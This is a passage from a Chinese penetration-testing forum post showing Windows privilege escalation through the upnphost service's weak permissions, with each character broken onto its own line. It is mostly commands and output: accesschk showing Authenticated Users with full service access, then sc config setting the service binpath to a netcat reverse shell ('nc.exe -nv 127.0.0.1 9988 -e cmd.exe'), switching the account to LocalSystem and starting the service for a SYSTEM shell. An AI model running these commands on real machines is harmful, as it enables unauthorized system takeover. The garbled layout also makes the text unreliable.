L
_
A
C
C
E
S
S
R
W
B
U
I
L
T
I
N
A
d
m
i
n
i
s
t
r
a
t
o
r
s
S
E
R
V
I
C
E
_
A
L
L
_
A
C
C
E
S
S
R
W
N
T
A
U
T
H
O
R
I
T
Y
A
u
t
h
e
n
t
i
c
a
t
e
d
U
s
e
r
s
S
E
R
V
I
C
E
_
A
L
L
_
A
C
C
E
S
S
R
W
B
U
I
L
T
I
N
P
o
w
e
r
U
s
e
r
s
S
E
R
V
I
C
E
_
A
L
L
_
A
C
C
E
S
S
R
W
N
T
A
U
T
H
O
R
I
T
Y
L
O
C
A
L
S
E
R
V
I
C
E
S
E
R
V
I
C
E
_
A
L
L
_
A
C
C
E
S
S
C
:
>
a
c
c
e
s
s
c
h
k
.
e
x
e
-
u
c
q
v
u
p
n
p
h
o
s
t
u
p
n
p
h
o
s
t
R
W
N
T
A
U
T
H
O
R
I
T
Y
S
Y
S
T
E
M
S
E
R
V
I
C
E
_
A
L
L
_
A
C
C
E
S
S
R
W
B
U
I
L
T
I
N
A
d
m
i
n
i
s
t
r
a
t
o
r
s
S
E
R
V
I
C
E
_
A
L
L
_
A
C
C
E
S
S
R
W
N
T
A
U
T
H
O
R
I
T
Y
A
u
t
h
e
n
t
i
c
a
t
e
d
U
s
e
r
s
S
E
R
V
I
C
E
_
A
L
L
_
A
C
C
E
S
S
R
W
B
U
I
L
T
I
N
P
o
w
e
r
U
s
e
r
s
S
E
R
V
I
C
E
_
A
L
L
_
A
C
C
E
S
S
R
W
N
T
A
U
T
H
O
R
I
T
Y
L
O
C
A
L
S
E
R
V
I
C
E
S
E
R
V
I
C
E
_
A
L
L
_
A
C
C
E
S
S
让
我
们
来
看
看
怎
么
实
践
操
作
,
在
这
个
例
子
里
该
服
务
将
会
执
行
n
e
t
c
a
t
并
且
可
以
反
弹
一
个
S
Y
S
T
E
M
权
限
的
s
h
e
l
l
。
其
它
的
操
作
方
法
当
然
也
是
可
能
存
在
的
。
C
:
>
s
c
q
c
u
p
n
p
h
o
s
t
[
S
C
]
G
e
t
S
e
r
v
i
c
e
C
o
n
f
i
g
S
U
C
C
E
S
S
S
E
R
V
I
C
E
_
N
A
M
E
:
u
p
n
p
h
o
s
t
T
Y
P
E
:
2
0
W
I
N
3
2
_
S
H
A
R
E
_
P
R
O
C
E
S
S
S
T
A
R
T
_
T
Y
P
E
:
3
D
E
M
A
N
D
_
S
T
A
R
T
E
R
R
O
R
_
C
O
N
T
R
O
L
:
1
N
O
R
M
A
L
B
I
N
A
R
Y
_
P
A
T
H
_
N
A
M
E
:
C
:
W
I
N
D
O
W
S
S
y
s
t
e
m
3
2
s
v
c
h
o
s
t
.
e
x
e
-
k
L
o
c
a
l
S
e
r
v
i
c
e
L
O
A
D
_
O
R
D
E
R
_
G
R
O
U
P
:
T
A
G
:
0
D
I
S
P
L
A
Y
_
N
A
M
E
:
U
n
i
v
e
r
s
a
l
P
l
u
g
a
n
d
P
l
a
y
D
e
v
i
c
e
H
o
s
t
D
E
P
E
N
D
E
N
C
I
E
S
:
S
S
D
P
S
R
V
S
E
R
V
I
C
E
_
S
T
A
R
T
_
N
A
M
E
:
N
T
A
U
T
H
O
R
I
T
Y
L
o
c
a
l
S
e
r
v
i
c
e
C
:
>
s
c
c
o
n
f
i
g
u
p
n
p
h
o
s
t
b
i
n
p
a
t
h
=
"
C
:
n
c
.
e
x
e
-
n
v
1
2
7
.
0
.
0
.
1
9
9
8
8
-
e
C
:
W
I
N
D
O
W
S
S
y
s
t
e
m
3
2
c
m
d
.
e
x
e
"
[
S
C
]
C
h
a
n
g
e
S
e
r
v
i
c
e
C
o
n
f
i
g
S
U
C
C
E
S
S
C
:
>
s
c
c
o
n
f
i
g
u
p
n
p
h
o
s
t
o
b
j
=
"
.
L
o
c
a
l
S
y
s
t
e
m
"
p
a
s
s
w
o
r
d
=
"
"
[
S
C
]
C
h
a
n
g
e
S
e
r
v
i
c
e
C
o
n
f
i
g
S
U
C
C
E
S
S
C
:
>
s
c
q
c
u
p
n
p
h
o
s
t
[
S
C
]
G
e
t
S
e
r
v
i
c
e
C
o
n
f
i
g
S
U
C
C
E
S
S
S
E
R
V
I
C
E
_
N
A
M
E
:
u
p
n
p
h
o
s
t
T
Y
P
E
:
2
0
W
I
N
3
2
_
S
H
A
R
E
_
P
R
O
C
E
S
S
S
T
A
R
T
_
T
Y
P
E
:
3
D
E
M
A
N
D
_
S
T
A
R
T
E
R
R
O
R
_
C
O
N
T
R
O
L
:
1
N
O
R
M
A
L
B
I
N
A
R
Y
_
P
A
T
H
_
N
A
M
E
:
C
:
n
c
.
e
x
e
-
n
v
1
2
7
.
0
.
0
.
1
9
9
8
8
-
e
C
:
W
I
N
D
O
W
S
S
y
s
t
e
m
3
2
c
m
d
.
e
x
e
L
O
A
D
_
O
R
D
E
R
_
G
R
O
U
P
:
T
A
G
:
0
D
I
S
P
L
A
Y
_
N
A
M
E
:
U
n
i
v
e
r
s
a
l
P
l
u
g
a
n
d
P
l
a
y
D
e
v
i
c
e
H
o
s
t
D
E
P
E
N
D
E
N
C
I
E
S
:
S
S
D
P
S
R
V
S
E
R
V
I
C
E
_
S
T
A
R
T
_
N
A
M
E
:
L
o
c
a
l
S
y
s
t
e
m
C
:
>
n
e
t
s
t
a
r
t
u
p
n
p
h
o
s
t
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试